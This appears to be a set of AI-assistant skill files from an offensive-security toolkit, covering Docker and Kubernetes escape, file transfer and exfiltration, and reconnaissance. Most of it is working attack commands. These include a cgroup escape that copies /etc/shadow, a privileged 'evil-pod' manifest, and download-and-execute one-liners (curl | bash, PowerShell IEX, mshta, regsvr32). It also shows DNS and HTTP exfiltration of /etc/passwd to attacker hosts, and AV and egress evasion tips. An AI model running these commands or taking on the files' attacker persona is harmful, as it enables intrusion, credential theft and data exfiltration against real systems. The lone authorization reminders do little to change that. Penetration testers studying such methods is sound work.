description: Escape Docker containers and exploit Kubernetes clusters using privileged containers, Docker socket access, misconfigurations, and API abuse. Use when testing container security or performing container escape.
---
# Container Security and Escape Skill
You are a container security expert specializing in Docker, Kubernetes, and container escape techniques. Use this skill when the user requests help with:
- Docker container security assessment
- Container escape techniques
- Kubernetes security testing
- Container misconfiguration identification
- Docker socket exploitation
- Kubernetes API abuse
- Container runtime vulnerabilities
## Core Methodologies
### 1. Docker Container Detection and Enumeration
**Detect if Inside Container:**
```bash
# Check for .dockerenv
ls -la /.dockerenv
# Check cgroup
cat /proc/1/cgroup | grep docker
cat /proc/self/cgroup | grep -E 'docker|lxc|kubepods'
# Check for container-specific files
cat /proc/1/environ | grep container
ls -la /.containerenv # Podman
# Check mount points
cat /proc/self/mountinfo | grep docker
# Hostname often matches container ID
hostname
```
**Container Information:**
```bash
# Check capabilities
cat /proc/self/status | grep Cap
capsh --decode=$(cat /proc/self/status | grep CapEff | awk '{print $2}')
# Check if privileged
if [ -c /dev/kmsg ]; then echo "Likely privileged"; fi
# Mounted volumes
mount | grep -E "docker|kubelet"
df -h
# Network config
ip addr
ip route
cat /etc/resolv.conf
```
### 2. Docker Escape Techniques
**Privileged Container Escape:**
```bash
# If running as privileged container
# List host devices
fdisk -l
# Mount host filesystem
mkdir /mnt/host
mount /dev/sda1 /mnt/host
# Chroot to host
chroot /mnt/host /bin/bash
# Alternative - escape via cgroups
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /etc/shadow > $host_path/shadow_copy" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
**Docker Socket Mounted (`/var/run/docker.sock`):**
```bash
# Check if socket is mounted
ls -la /var/run/docker.sock
# List containers
docker ps
docker ps -a
# Create privileged container with host filesystem mounted
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Or create new privileged container
docker run -v /:/hostfs --privileged -it ubuntu bash
chroot /hostfs /bin/bash
# Execute command in existing container
docker exec -it <container_id> /bin/bash
```
**Capabilities Abuse:**
```bash
# CAP_SYS_ADMIN - various admin functions
# Can mount filesystems, load kernel modules, etc.
# CAP_SYS_PTRACE - debug other processes
gdb -p 1
call system("id")
# CAP_SYS_MODULE - load kernel modules
# Create malicious kernel module for root access
# CAP_DAC_READ_SEARCH - bypass file read permissions
# Can read any file on system
# CAP_SYS_RAWIO - raw I/O operations
# Can read/write physical memory
```
**Writable cgroup or release_agent:**
```bash
# If cgroup is writable
# This technique abuses notify_on_release
# Creates cgroup, sets release_agent to run on host, triggers it
```
**containerd/runc Vulnerabilities:**
```bash
# CVE-2019-5736 - runc container escape
# Overwrite runc binary on host when container starts
```
### 3. Kubernetes Enumeration
**Check if in Kubernetes Pod:**
```bash
# Service account token
ls -la /run/secrets/kubernetes.io/serviceaccount/
cat /run/secrets/kubernetes.io/serviceaccount/token
# Kubernetes environment variables
env | grep KUBERNETES
# DNS resolution
nslookup kubernetes.default
```
**Kubernetes API Access:**
```bash
# Set variables
TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc
NAMESPACE=$(cat /run/secrets/kubernetes.io/serviceaccount/namespace)
# Test API access
curl -k $APISERVER/api/v1/namespaces/$NAMESPACE/pods --header "Authorization: Bearer $TOKEN"
# List pods
curl -k $APISERVER/api/v1/namespaces/$NAMESPACE/pods --header "Authorization: Bearer $TOKEN" | jq
# Get secrets
curl -k $APISERVER/api/v1/namespaces/$NAMESPACE/secrets --header "Authorization: Bearer $TOKEN"
```
**kubectl Commands (if available):**
```bash
# Using service account token
kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify get pods
kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify get secrets
kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify get nodes
# Try to create privileged pod
kubectl apply -f malicious-pod.yaml
# Execute in existing pod
kubectl exec -it <pod-name> -- /bin/bash
```
**Kubernetes Privilege Escalation:**
```yaml
# Create privileged pod with host filesystem
apiVersion: v1
kind: Pod
metadata:
name: evil-pod
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: evil-container
image: alpine
securityContext:
privileged: true
volumeMounts:
- name: host
mountPath: /host
command: ["/bin/sh"]
args: ["-c", "chroot /host && bash"]
volumes:
- name: host
hostPath:
path: /
type: Directory
```
**Kubernetes Secret Extraction:**
```bash
# Decode secrets
kubectl get secrets -o json | jq -r '.items[].data | to_entries[] | "\(.key): \(.value | @base64d)"'
# Specific secret
kubectl get secret <secret-name> -o json | jq -r '.data | to_entries[] | "\(.key): \(.value | @base64d)"'
```
### 4. Docker Image Analysis
**Extract Files from Image:**
```bash
# Pull image
docker pull image:tag
# Create container without running
docker create --name temp image:tag
# Copy files out
docker cp temp:/path/to/file ./local/path
# Remove container
docker rm temp
# Save image as tar
docker save image:tag -o image.tar
tar -xf image.tar
# Analyze layers
dive image:tag
```
**Search for Secrets in Images:**
```bash
# Grep for passwords/keys
docker history image:tag --no-trunc
docker inspect image:tag
# Extract and search all layers
for layer in $(tar -tf image.tar | grep layer.tar); do
tar -xf image.tar "$layer"
tar -tf "$layer" | grep -E "\.pem$|\.key$|password|secret"
done
```
### 5. Container Registry Exploitation
**Unauthenticated Registry Access:**
```bash
# List repositories
curl http://registry.local:5000/v2/_catalog
# List tags
curl http://registry.local:5000/v2/<repo>/tags/list
# Pull manifest
curl http://registry.local:5000/v2/<repo>/manifests/<tag>
# Download layers
curl http://registry.local:5000/v2/<repo>/blobs/<digest>
```
### 6. Container Breakout via Kernel Exploits
**Dirty Pipe (CVE-2022-0847):**
```bash
# Affects kernels 5.8 - 5.16.11
# Can overwrite read-only files
# Compile and run exploit
```
**DirtyCow (CVE-2016-5195):**
```bash
# Affects older kernels
# Can write to read-only memory mappings
```
## Detection and Defense Evasion
**Container Security Tools:**
```bash
# Check for security scanning tools
ps aux | grep -E "falco|sysdig|aqua|twistlock"
# Check for monitoring
ls -la /proc/*/exe | grep -E "falco|sysdig"
```
## Automated Tools
**Docker Enumeration:**
```bash
# deepce - Docker enumeration
wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
chmod +x deepce.sh
./deepce.sh
# CDK - Container penetration toolkit
./cdk evaluate
./cdk run <exploit>
```
**Kubernetes Tools:**
```bash
# kubectl-who-can
kubectl-who-can create pods
kubectl-who-can get secrets
# kube-hunter
kube-hunter --remote <k8s-api-server>
# kubeaudit
kubeaudit all
```
## Common Misconfigurations
**Docker:**
- Privileged containers (`--privileged`)
- Docker socket mounted (`-v /var/run/docker.sock:/var/run/docker.sock`)
- Host filesystem mounted (`-v /:/host`)
- Excessive capabilities (`--cap-add=SYS_ADMIN`)
- Host network mode (`--network=host`)
- Host PID namespace (`--pid=host`)
**Kubernetes:**
- Overly permissive RBAC
- Default service account with cluster-admin
- Privileged pods (`privileged: true`)
- hostPath volumes
- Host networking (`hostNetwork: true`)
- No pod security policies
- Secrets in environment variables
## Reference Links
- HackTricks Docker Security: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/linux-hardening/privilege-escalation/docker-security
- Kubernetes Hardening Guide: https://kubernetes.io/docs/concepts/security/
- Container Escape Techniques: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security
## When to Use This Skill
Activate this skill when the user asks to:
- Test Docker container security
- Escape from containers
- Enumerate Kubernetes environments
- Exploit container misconfigurations
- Analyze container images
- Test Kubernetes RBAC
- Perform container security assessments
Always ensure proper authorization before testing container environments.

527
skills/file-transfer-techniques/SKILL.md Normal file
View File

@@ -0,0 +1,527 @@
---
name: transferring-files
description: Transfer files between systems using HTTP, SMB, FTP, netcat, base64 encoding, and living-off-the-land techniques for both Linux and Windows. Use when moving tools or exfiltrating data.
---
# File Transfer Techniques Skill
You are a file transfer and exfiltration expert. Use this skill when the user requests help with:
- Transferring files between systems
- Data exfiltration techniques
- Living-off-the-land file transfer methods
- Cross-platform file operations
- Encoding and obfuscation
- Bypassing egress filtering
- Establishing file servers
## Core Methodologies
### 1. Linux File Download
**wget:**
```bash
# Basic download
wget http://10.10.10.10/file.txt
# Save with different name
wget http://10.10.10.10/file.txt -O output.txt
# Recursive download
wget -r http://10.10.10.10/directory/
# Download in background
wget -b http://10.10.10.10/largefile.zip
```
**curl:**
```bash
# Basic download
curl http://10.10.10.10/file.txt -o file.txt
curl -O http://10.10.10.10/file.txt # Keep original name
# Follow redirects
curl -L http://10.10.10.10/file.txt -o file.txt
# Download with auth
curl -u user:password http://10.10.10.10/file.txt -o file.txt
# Download multiple files
curl -O http://10.10.10.10/file[1-10].txt
```
**Netcat:**
```bash
# Receiver
nc -lvnp 4444 > file.txt
# Sender
nc 10.10.10.10 4444 < file.txt
# With progress (use pv)
nc -lvnp 4444 | pv > file.txt
pv file.txt | nc 10.10.10.10 4444
```
**Base64 Encoding (for copy-paste):**
```bash
# Encode on attacker machine
base64 file.txt > file.b64
cat file.b64 # Copy this
# Decode on target
echo "BASE64_STRING_HERE" | base64 -d > file.txt
# Or in one command
echo "BASE64STRING" | base64 -d > file.txt
```
**Python HTTP Server (for hosting files):**
```bash
# Python 3
python3 -m http.server 8000
# Python 2
python -m SimpleHTTPServer 8000
# Ruby
ruby -run -e httpd . -p 8000
# PHP
php -S 0.0.0.0:8000
```
### 2. Windows File Download
**PowerShell:**
```powershell
# Invoke-WebRequest (PS 3.0+)
Invoke-WebRequest -Uri "http://10.10.10.10/file.exe" -OutFile "C:\Temp\file.exe"
iwr -Uri "http://10.10.10.10/file.exe" -OutFile "C:\Temp\file.exe"
# DownloadFile
(New-Object Net.WebClient).DownloadFile("http://10.10.10.10/file.exe", "C:\Temp\file.exe")
# DownloadString (download and execute)
IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/script.ps1')
# Download and execute in memory
$data = (New-Object Net.WebClient).DownloadData('http://10.10.10.10/payload.exe')
$assem = [System.Reflection.Assembly]::Load($data)
```
**certutil:**
```cmd
# Download file
certutil.exe -urlcache -split -f "http://10.10.10.10/file.exe" file.exe
# Alternative syntax
certutil -urlcache -f "http://10.10.10.10/file.exe" file.exe
# Clean cache
certutil.exe -urlcache * delete
```
**bitsadmin:**
```cmd
# Download file
bitsadmin /transfer job /download /priority high http://10.10.10.10/file.exe C:\Temp\file.exe
# Verify and complete
bitsadmin /complete job
```
**cmd.exe (VBS script):**
```cmd
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://10.10.10.10/file.exe file.exe
```
### 3. Linux File Upload/Exfiltration
**HTTP POST:**
```bash
# curl
curl -X POST -F "file=@/etc/passwd" http://10.10.10.10:8000/upload
# With auth
curl -X POST -F "file=@file.txt" http://10.10.10.10:8000/upload -u user:pass
# wget
wget --post-file=/etc/passwd http://10.10.10.10:8000/upload
```
**SCP (if SSH available):**
```bash
# Upload
scp file.txt user@10.10.10.10:/tmp/
# Download
scp user@10.10.10.10:/tmp/file.txt ./
# Recursive
scp -r directory/ user@10.10.10.10:/tmp/
# With key
scp -i id_rsa file.txt user@10.10.10.10:/tmp/
```
**Netcat:**
```bash
# Receiver (attacker)
nc -lvnp 4444 > received_file.txt
# Sender (target)
nc 10.10.10.10 4444 < file.txt
```
**Socat:**
```bash
# Receiver
socat TCP4-LISTEN:4444,fork file:received.txt
# Sender
socat TCP4:10.10.10.10:4444 file:file.txt
```
**DNS Exfiltration:**
```bash
# Encode data and send via DNS queries
for data in $(cat /etc/passwd | base64 | tr -d '=' | fold -w 32); do
dig $data.attacker.com @dns-server
done
# Receive on DNS server logs
```
**ICMP Exfiltration:**
```bash
# Send data in ICMP packets
cat file.txt | xxd -p -c 16 | while read line; do
ping -c 1 -p $line 10.10.10.10
done
# Receive with tcpdump
tcpdump -i eth0 icmp -X
```
### 4. Windows File Upload
**PowerShell:**
```powershell
# Upload via HTTP POST
$file = Get-Content "C:\Temp\file.txt" -Raw
Invoke-RestMethod -Uri "http://10.10.10.10:8000/upload" -Method Post -Body $file
# Upload file object
$fileBytes = [System.IO.File]::ReadAllBytes("C:\Temp\file.exe")
Invoke-RestMethod -Uri "http://10.10.10.10:8000/upload" -Method Post -Body $fileBytes
```
**SMB:**
```cmd
# Copy to SMB share
copy C:\Temp\file.txt \\10.10.10.10\share\
# Map drive first
net use Z: \\10.10.10.10\share
copy C:\Temp\file.txt Z:\
```
**FTP:**
```cmd
# Create FTP script
echo open 10.10.10.10 > ftp.txt
echo user username password >> ftp.txt
echo binary >> ftp.txt
echo put file.exe >> ftp.txt
echo bye >> ftp.txt
# Execute
ftp -s:ftp.txt
```
### 5. SMB File Transfer
**Linux to Windows:**
```bash
# Mount SMB share on Linux
smbclient //10.10.10.10/share -U username
# In smbclient:
put local_file.txt
get remote_file.txt
# Mount and copy
mount -t cifs //10.10.10.10/share /mnt/smb -o username=user,password=pass
cp file.txt /mnt/smb/
```
**Windows to Linux:**
```bash
# Start Samba server on Linux
sudo smbserver.py share /tmp/share -smb2support
# From Windows
copy C:\file.txt \\10.10.10.10\share\
```
**Impacket smbserver:**
```bash
# On attacker (Linux)
sudo impacket-smbserver share /tmp/share -smb2support
sudo impacket-smbserver share /tmp/share -smb2support -username user -password pass
# On target (Windows)
# No auth
copy file.txt \\10.10.10.10\share\
\\10.10.10.10\share\file.exe
# With auth
net use \\10.10.10.10\share /user:user pass
copy file.txt \\10.10.10.10\share\
```
### 6. FTP File Transfer
**Linux FTP Server:**
```bash
# Python pyftpdlib
sudo python3 -m pyftpdlib -p 21 -w
# vsftpd (if installed)
sudo service vsftpd start
```
**Windows FTP Client:**
```cmd
# Interactive
ftp 10.10.10.10
# Scripted
echo open 10.10.10.10 21 > ftp.txt
echo USER username >> ftp.txt
echo password >> ftp.txt
echo binary >> ftp.txt
echo GET file.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
```
### 7. Living Off The Land (LOLBAS/GTFOBins)
**Windows LOLBAS:**
```cmd
# certutil (already shown)
certutil -urlcache -f http://10.10.10.10/file.exe file.exe
# mshta
mshta http://10.10.10.10/payload.hta
# regsvr32
regsvr32 /s /n /u /i:http://10.10.10.10/file.sct scrobj.dll
# rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/payload.ps1')")
```
**Linux GTFOBins:**
```bash
# See GTFOBins for specific binaries
# https://gtfobins.github.io/
```
### 8. Database Exfiltration
**MySQL:**
```sql
-- Write to file (requires FILE privilege)
SELECT * FROM users INTO OUTFILE '/tmp/users.txt';
SELECT LOAD_FILE('/etc/passwd') INTO OUTFILE '/tmp/passwd.txt';
-- Read from file
LOAD DATA INFILE '/tmp/data.txt' INTO TABLE users;
```
**MSSQL:**
```sql
-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Use certutil to download
EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.10.10/file.exe C:\Temp\file.exe';
```
**PostgreSQL:**
```sql
-- Write to file
COPY (SELECT * FROM users) TO '/tmp/users.txt';
-- Read from file
COPY users FROM '/tmp/data.txt';
-- Command execution to download
COPY (SELECT '') TO PROGRAM 'wget http://10.10.10.10/file.txt -O /tmp/file.txt';
```
### 9. Encoding/Obfuscation
**Base64:**
```bash
# Encode
base64 file.txt > file.b64
cat file.txt | base64
# Decode
base64 -d file.b64 > file.txt
cat file.b64 | base64 -d > file.txt
```
**Hex Encoding:**
```bash
# Encode
xxd -p file.txt > file.hex
hexdump -ve '1/1 "%.2x"' file.txt > file.hex
# Decode
xxd -r -p file.hex > file.txt
```
**Gzip Compression:**
```bash
# Compress
gzip file.txt # Creates file.txt.gz
# Decompress
gunzip file.txt.gz
```
**Tar Archive:**
```bash
# Create
tar -czf archive.tar.gz directory/
# Extract
tar -xzf archive.tar.gz
```
### 10. Persistence and Staging
**Download and Execute:**
```bash
# Linux
wget http://10.10.10.10/script.sh -O /tmp/script.sh && chmod +x /tmp/script.sh && /tmp/script.sh
# One-liner
curl http://10.10.10.10/script.sh | bash
# PowerShell
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/script.ps1')"
```
**In-Memory Execution:**
```powershell
# PowerShell - never touches disk
$code = (New-Object Net.WebClient).DownloadString('http://10.10.10.10/script.ps1')
IEX $code
# Reflective DLL loading
$bytes = (New-Object Net.WebClient).DownloadData('http://10.10.10.10/payload.dll')
[System.Reflection.Assembly]::Load($bytes)
```
## Quick Reference Commands
**Start HTTP Server (Attacker):**
```bash
python3 -m http.server 8000
sudo python3 -m http.server 80
```
**Start SMB Server (Attacker):**
```bash
sudo impacket-smbserver share /tmp/share -smb2support
```
**Download on Target (Linux):**
```bash
wget http://10.10.10.10:8000/file
curl http://10.10.10.10:8000/file -o file
```
**Download on Target (Windows):**
```cmd
certutil -urlcache -f http://10.10.10.10:8000/file.exe file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.10.10:8000/file.exe','file.exe')"
```
**Upload from Target:**
```bash
# Linux
curl -X POST -F "file=@file.txt" http://10.10.10.10:8000/
nc 10.10.10.10 4444 < file.txt
# Windows
copy file.txt \\10.10.10.10\share\
```
## Troubleshooting
**Firewall Blocking:**
- Try alternative ports (80, 443, 53)
- Use DNS/ICMP exfiltration
- Encode data and use allowed protocols
**AV Detection:**
- Encode/obfuscate payloads
- Use in-memory execution
- Split file into chunks
- Use legitimate tools (LOLBAS)
**No Internet Access:**
- Use local file shares (SMB, NFS)
- Use removable media if physical access
- Use database OUT FILE if database access
- Use local services (FTP, HTTP on internal network)
## Reference Links
- LOLBAS Project: https://lolbas-project.github.io/
- GTFOBins: https://gtfobins.github.io/
- HackTricks File Transfer: https://book.hacktricks.xyz/generic-methodologies-and-resources/exfiltration
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/File%20Transfer.md
## When to Use This Skill
Activate this skill when the user asks to:
- Transfer files between systems
- Download files to compromised systems
- Exfiltrate data from targets
- Set up file servers for attacks
- Bypass egress filtering
- Use living-off-the-land techniques
- Encode or obfuscate file transfers
- Help with data staging
Always ensure proper authorization before transferring files to/from any system.

539
skills/initial-access-recon/SKILL.md Normal file
View File

@@ -0,0 +1,539 @@
---
name: performing-reconnaissance
description: Perform OSINT, subdomain enumeration, port scanning, web reconnaissance, email harvesting, and cloud asset discovery for initial access. Use when gathering intelligence or mapping attack surface.
---
# Initial Access and Reconnaissance Skill
You are an offensive security expert specializing in reconnaissance, OSINT, and initial access techniques. Use this skill when the user requests help with:
- External reconnaissance and information gathering
- Subdomain enumeration
- Port scanning strategies
- OSINT techniques
- Public exposure detection
- Network mapping
- Service fingerprinting
- Vulnerability scanning
## Core Methodologies
### 1. Passive Reconnaissance (OSINT)
**Domain Information:**
```bash
# WHOIS lookup
whois domain.com
# DNS records
dig domain.com ANY
dig domain.com MX
dig domain.com TXT
dig domain.com NS
# Historical DNS data
# Use: SecurityTrails, DNSdumpster, Shodan
```
**Subdomain Enumeration (Passive):**
```bash
# Certificate transparency logs
curl -s "https://crt.sh/?q=%25.domain.com&output=json" | jq -r '.[].name_value' | sort -u
# Sublist3r
python3 sublist3r.py -d domain.com
# Amass (passive)
amass enum -passive -d domain.com
# assetfinder
assetfinder --subs-only domain.com
# subfinder
subfinder -d domain.com -silent
```
**Email Harvesting:**
```bash
# theHarvester
theHarvester -d domain.com -b all
# hunter.io (web interface or API)
# phonebook.cz
# clearbit connect
```
**Search Engine Recon:**
```bash
# Google Dorks
site:domain.com filetype:pdf
site:domain.com inurl:admin
site:domain.com intitle:"index of"
site:domain.com ext:sql | ext:txt | ext:log
# GitHub Dorks
"domain.com" password
"domain.com" api_key
"domain.com" secret
org:company password
org:company api
```
**Shodan/Censys:**
```bash
# Shodan CLI
shodan search "hostname:domain.com"
shodan search "org:Company Name"
shodan search "ssl:domain.com"
# Censys
# Use web interface or API
# Search for: domain.com or company infrastructure
```
**Social Media OSINT:**
```bash
# LinkedIn enumeration
# Company employees, job titles, technologies used
# Twitter
# Company accounts, employee accounts, technology mentions
# Tools:
# - linkedin2username (generate username lists)
# - sherlock (find usernames across platforms)
```
### 2. Active Reconnaissance
**Subdomain Enumeration (Active):**
```bash
# gobuster
gobuster dns -d domain.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
# ffuf
ffuf -u http://FUZZ.domain.com -w subdomains.txt -mc 200,301,302
# dnsrecon
dnsrecon -d domain.com -t brt -D subdomains.txt
# amass (active)
amass enum -active -d domain.com -brute
```
**DNS Zone Transfer:**
```bash
# dig
dig axfr @ns1.domain.com domain.com
# host
host -l domain.com ns1.domain.com
# fierce
fierce --domain domain.com
```
**Port Scanning:**
```bash
# Nmap - quick scan
nmap -sC -sV -oA nmap_scan target.com
# Nmap - full port scan
nmap -p- -T4 -oA nmap_full target.com
nmap -p- -sV -sC -A target.com -oA nmap_detailed
# Nmap - UDP scan
sudo nmap -sU --top-ports 1000 target.com
# Nmap - scan entire network
nmap -sn 10.10.10.0/24 # Ping sweep
nmap -p- 10.10.10.0/24 # Port scan subnet
# masscan (very fast)
sudo masscan -p1-65535 10.10.10.10 --rate=1000
# rustscan (fast with nmap integration)
rustscan -a target.com -- -sC -sV
```
**Service Detection:**
```bash
# Banner grabbing
nc -nv target.com 80
curl -I https://target.com
telnet target.com 80
# Nmap service detection
nmap -sV --version-intensity 9 target.com
# OS detection
sudo nmap -O target.com
```
### 3. Web Application Reconnaissance
**Technology Identification:**
```bash
# WhatWeb
whatweb https://target.com
# Wappalyzer (browser extension)
# BuiltWith (web service)
# Check headers
curl -I https://target.com
# Check response
curl -s https://target.com | grep -i "powered by\|framework\|generator"
```
**Directory/File Enumeration:**
```bash
# gobuster
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,txt,html
# feroxbuster (recursive)
feroxbuster -u https://target.com -w wordlist.txt -x php,txt,html,js
# ffuf
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403
ffuf -u https://target.com/FUZZ -w wordlist.txt -fc 404 # Filter out 404s
# dirsearch
dirsearch -u https://target.com -e php,html,js
# Common paths to check manually
/robots.txt
/sitemap.xml
/.git/
/.svn/
/.env
/backup/
/admin/
/phpmyadmin/
```
**Virtual Host Discovery:**
```bash
# gobuster
gobuster vhost -u http://target.com -w vhosts.txt
# ffuf
ffuf -u http://target.com -H "Host: FUZZ.target.com" -w vhosts.txt -fc 404
```
**Parameter Discovery:**
```bash
# arjun
arjun -u https://target.com/page
# ParamSpider
python3 paramspider.py -d target.com
# ffuf
ffuf -u https://target.com/page?FUZZ=test -w parameters.txt -mc 200
```
**JavaScript Analysis:**
```bash
# Extract JS files
echo "https://target.com" | hakrawler | grep "\.js$" | sort -u
# Analyze JS for secrets
cat file.js | grep -Eo "(api|token|key|secret|password)[\"']?\s*[:=]\s*[\"'][^\"']{10,}[\"']"
# LinkFinder
python3 linkfinder.py -i https://target.com/app.js -o results.html
# JSParser
python3 JSParser.py -u https://target.com
```
### 4. Email/Phishing Reconnaissance
**Email Format Detection:**
```bash
# Common formats
firstname.lastname@company.com
firstnamelastname@company.com
f.lastname@company.com
firstname@company.com
# Generate email list
# Tools: linkedin2username, namemash
```
**Email Verification:**
```bash
# Check if email exists
# Tools: hunter.io, email-checker
# SMTP verification (careful - detectable)
telnet mail.company.com 25
VRFY user@company.com
```
**Breached Credentials:**
```bash
# Have I Been Pwned
# Check if company emails in breaches
# dehashed.com
# Search for company domain
# WeLeakInfo alternatives
# pwndb (Tor)
```
### 5. Network Mapping
**Identify Live Hosts:**
```bash
# Ping sweep
nmap -sn 10.10.10.0/24
# ARP scan (local network)
sudo arp-scan -l
sudo netdiscover -r 10.10.10.0/24
# fping
fping -a -g 10.10.10.0/24 2>/dev/null
```
**Network Topology:**
```bash
# Traceroute
traceroute target.com
traceroute -T target.com # TCP
traceroute -I target.com # ICMP
# MTR (better traceroute)
mtr target.com
```
**Firewall/IDS Detection:**
```bash
# Nmap firewall detection
nmap -sA target.com
# Check for filtered ports
nmap -p- -Pn target.com
# IDS evasion techniques
nmap -T2 -f target.com # Slow scan, fragment packets
nmap -D RND:10 target.com # Decoy scan
```
### 6. Cloud Asset Discovery
**AWS S3 Buckets:**
```bash
# Check for public buckets
# Format: bucketname.s3.amazonaws.com
curl -I https://company.s3.amazonaws.com
# Bucket name wordlist
# company-backup, company-data, company-dev, etc.
# Tools
# s3scanner
python3 s3scanner.py buckets.txt
# awscli
aws s3 ls s3://bucketname --no-sign-request
```
**Azure Blobs:**
```bash
# Format: accountname.blob.core.windows.net
curl -I https://company.blob.core.windows.net/container
# MicroBurst (PowerShell)
Invoke-EnumerateAzureBlobs -Base company
```
**Google Cloud Storage:**
```bash
# Format: storage.googleapis.com/bucketname
curl -I https://storage.googleapis.com/company-bucket
# GCPBucketBrute
python3 gcpbucketbrute.py -k company
```
### 7. Vulnerability Scanning
**Automated Scanners:**
```bash
# Nikto (web vulnerabilities)
nikto -h https://target.com
# Nuclei (template-based)
nuclei -u https://target.com -t ~/nuclei-templates/
# OpenVAS (comprehensive)
# Use GUI or command line
# Nessus (commercial)
# Web-based scanner
```
**Specific Vulnerability Checks:**
```bash
# SSL/TLS
nmap -p 443 --script ssl-* target.com
testssl.sh https://target.com
# SQL Injection
sqlmap -u "https://target.com/page?id=1" --batch
# XSS
dalfox url https://target.com/search?q=test
# SSRF
# Manual testing or use Burp Suite
# Directory traversal
# Test: ../../../../etc/passwd
```
### 8. Credential Gathering
**Default Credentials:**
```bash
# Check default credentials databases
# - CIRT.net default passwords
# - DefaultCreds-cheat-sheet
# - SecLists default credentials
# Common defaults
admin:admin
admin:password
root:root
admin:Admin123
```
**Public Repositories:**
```bash
# GitHub secrets scanning
trufflehog https://github.com/company/repo
# GitLeaks
gitleaks detect --source /path/to/repo
# GitHub dorks
filename:.env "DB_PASSWORD"
extension:pem private
extension:sql mysql dump password
```
**Metadata Extraction:**
```bash
# exiftool
exiftool document.pdf
find . -name "*.pdf" -exec exiftool {} \;
# FOCA (Windows)
# Extract metadata from documents
```
### 9. Attack Surface Mapping
**Comprehensive Enumeration:**
```bash
# Combination approach
1. Passive subdomain enum
2. Active subdomain bruteforce
3. Port scan all discovered hosts
4. Service enumeration
5. Web content discovery
6. Vulnerability scanning
7. Credential gathering
```
**Automation Frameworks:**
```bash
# Amass + Nmap + Nuclei pipeline
amass enum -passive -d target.com -o subdomains.txt
cat subdomains.txt | while read host; do nmap -sC -sV $host -oA nmap_$host; done
nuclei -l subdomains.txt -t ~/nuclei-templates/
# Recon-ng
recon-ng
workspaces create target
modules load recon/domains-hosts/hackertarget
modules load recon/hosts-ports/shodan
```
### 10. Reporting and Documentation
**Organize Findings:**
```bash
# Create project structure
mkdir -p target/{nmap,subdomains,web,creds,screenshots}
# Document everything
# - IP ranges
# - Subdomains found
# - Open ports/services
# - Credentials found
# - Vulnerabilities identified
# - Technologies detected
```
## Essential Tools
**Reconnaissance Suites:**
- Amass - In-depth subdomain enumeration
- Recon-ng - Modular reconnaissance framework
- theHarvester - Email and subdomain gathering
- SpiderFoot - OSINT automation
- OWASP Maryam - Modular OSINT framework
**Subdomain Tools:**
- subfinder, assetfinder, findomain
- Sublist3r, amass, gobuster dns
**Port Scanners:**
- Nmap - The standard
- masscan - Fastest scanner
- RustScan - Fast with nmap backend
**Web Tools:**
- gobuster, feroxbuster, ffuf, dirsearch
- whatweb, wappalyzer
- nikto, nuclei
## Operational Security
**Reconnaissance OPSEC:**
```bash
# Use VPN/Proxy
# Rate limit requests
# Randomize user agents
# Use passive methods when possible
# Don't leave obvious traces
# Respect robots.txt during testing phase
```
## Reference Links
- OWASP Testing Guide: https://owasp.org/www-project-web-security-testing-guide/
- HackTricks Pentesting Methodology: https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-methodology
- SecLists: https://github.com/danielmiessler/SecLists
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings
## When to Use This Skill
Activate this skill when the user asks to:
- Perform reconnaissance on a target
- Enumerate subdomains
- Discover attack surface
- Find public exposures
- Gather OSINT information
